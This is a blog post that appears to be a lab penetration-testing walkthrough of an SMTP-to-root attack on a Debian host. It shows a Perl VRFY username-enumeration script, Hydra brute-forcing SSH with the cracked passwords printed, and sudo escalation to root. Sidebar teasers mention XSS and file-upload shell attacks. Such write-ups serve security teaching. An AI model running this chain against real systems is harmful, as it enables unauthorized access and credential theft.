Wednesday, April 24, 2019

Attacking SMTP on Debian Linux

First lets do a quick service scan against the remote host. 
root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2018-12-28 19:39 MST
Nmap scan report for mail.acme.com
Host is up (0.00097s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
25/tcp open  smtp    Sendmail 8.15.2/8.15.2/Debian-8
MAC Address: 08:00:27:0C:B6:CC (Oracle VirtualBox virtual NIC)
Service Info: Host: debian9.acme.com; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds
root@asus:/mnt%

Verify SMTP service is accepting connections

To verify whether or not the SMTP is actually running we can connect to it via telnet and issue a few commands. 

root@asus:~/pentest_notes% telnet mail.acme.com 25
Trying mail.acme.com...
Connected to mail.acme.com.
Escape character is '^]'.
220 mail.acme.com ESMTP Sendmail 8.15.2/8.15.2/Debian-8; Fri, 28 Dec 2018 19:31:58 -0700;
HELO mail.acme.com
250 mail.acme.com Hello [77.x.x.x], pleased to meet you
quit
221 2.0.0 mail.acme.com closing connection
Connection closed by foreign host.
root@asus:~/pentest_notes%

Data set and user name enumeration

We need to create a list of potential users on the system from a list of names we got during OSINT.

Employee Names from Company Website 
ray barnes
eaton gill
melodie foley
gail ramsey
amanda ruiz
blake wise
chanda goodman
perry tucker
arden clayton

from here we need to try different combinations of first and last name.

examples: 
Ray Barnes = `rbarnes`
Ray Barnes = `rayb`
Ray Barnes = `r.barnes`
Ray Barnes = `ray`
Ray Barnes = `ray_barnes`
etc...

our list should look something like so: 

root@asus:~/pentest_notes% cat en.txt | sort | head -n 15
a.clayton
a_clayton
aclayton
amanda
amandar
arden
ardenc
a.ruiz
a_ruiz
aruiz
barnesr
blake
blakew
b.wise
b_wise
root@asus:~/pentest_notes%

Verifying mail users using VRFY command

There are 3 ways we can see if users exist on the system. VRFY, EXPN and RCPT TO. In this example we will be using the VRFY command to enumerate users since we know its allowed on the server. We can write a small script to enumerate a list of users instead of doing it manually. 

----- SNIP -----

#!/usr/bin/env perl
use strict;
use warnings;

use Net::SMTP;

open(my $fh, '<', 'users.txt') or die $!;

my @users;
while (<$fh>) {
    chomp($_);
    push(@users, $_);
}

close($fh) or die $!;

my $s = Net::SMTP->new('mail.acme.com');

for my $user (0..$#users) { 
    print "$users[$user] user exists\n" if ($s->verify($users[$user]));
    sleep(1);
}
$s->quit; 

----- SNIP -----

Now we can enumerate the server for possible usernames on the remote system. 

root@asus:~/pentest_notes% ./enum_smtp_users.pl 
rbarnes user exists
egill user exists
mfoley user exists
gramsey user exists
aruiz user exists
bwise user exists
cgoodman user exists
ptucker user exists
aclayton user exists
root@asus:~/pentest_notes%

looks like we found some valid combinations using only first and last names. our next task is to issue a dictionary attack against SSH using these usernames and the rockyou.txt word list and see what we can find.

Cracking User Logins With Hydra

For the dictionary attack we are going to use Hydra. 

root@asus:~/pentest_notes% hydra -L smtp-users.txt -P ry-smtp.txt -t 4 mail.acme.com ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-29 10:09:27
[DATA] max 16 tasks per 1 server, overall 64 tasks, 81 login tries (l:9/p:9), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: mail.acme.com   login: rbarnes   password: YOUSUCK!
[22][ssh] host: mail.acme.com   login: egill   password: fulori
[22][ssh] host: mail.acme.com   login: mfoley   password: pielagorda
[22][ssh] host: mail.acme.com   login: gramsey   password: shin4ever
[22][ssh] host: mail.acme.com   login: aruiz   password: bubba98
[22][ssh] host: mail.acme.com   login: bwise   password: 241729
[22][ssh] host: mail.acme.com   login: cgoodman   password: almaleticia
[22][ssh] host: mail.acme.com   login: ptucker   password: sdsmfree
[22][ssh] host: mail.acme.com   login: aclayton   password: lak6510
1 of 1 target successfully completed, 9 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-27 22:55:50
root@asus:~/pentest_notes%

Verify remote login users and passwords

looks like we were able to crack all the passwords. Our next task is to test SSH to see if these logins actually work. 

root@asus:~/pentest_notes% ssh -l rbarnes 192.168.0.114
rbarnes@192.168.0.114's password: 
Linux debian9 4.9.0-8-686 #1 SMP Debian 4.9.130-2 (2018-10-27) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
rbarnes@debian9:~$ id
uid=1005(rbarnes) gid=1005(rbarnes) groups=1005(rbarnes)
rbarnes@debian9:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for rbarnes: 
rbarnes is not in the sudoers file.  This incident will be reported.
rbarnes@debian9:~$

The login works, but unfortunately we are not in the sudoers group. also note our attempt was logged which is not a good thing.

Privilege Escalation to root

if we keep digging we find an account which is in the sudoers group. 

root@asus:~/pentest_notes% ssh -l aclayton 192.168.0.114
aclayton@192.168.0.114's password: 
Linux debian9 4.9.0-8-686 #1 SMP Debian 4.9.130-2 (2018-10-27) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 26 20:12:09 2018 from 192.168.0.100
aclayton@debian9:~$ id
uid=1001(aclayton) gid=1001(aclayton) groups=1001(aclayton),27(sudo)
aclayton@debian9:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for aclayton: 
root@debian9:/home/aclayton# id
uid=0(root) gid=0(root) groups=0(root)
root@debian9:/home/aclayton#
as you can see we just issue a `sudo -s` with the password we cracked earlier and got a root shell from just a list of names from the company website.
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • bWAPP CSRF
    CSRF (Change Password) The first challenge is the change password CSRF. Our goal is to successfully change the users password with out log...
  • DVWA: File Upload
    Our goal is to exploit the weakness in file upload checking and obtain a remote system shell on the host. We start off with the security b...
  • bWAPP XSS Injections
    Cross-site-Scripting - Reflected (GET) Payload: <script>alert(1)</script> Cross-site-Scripting - Reflected (POST) Payload:...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Exploiting Weak WEBDAV Configurations
    The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...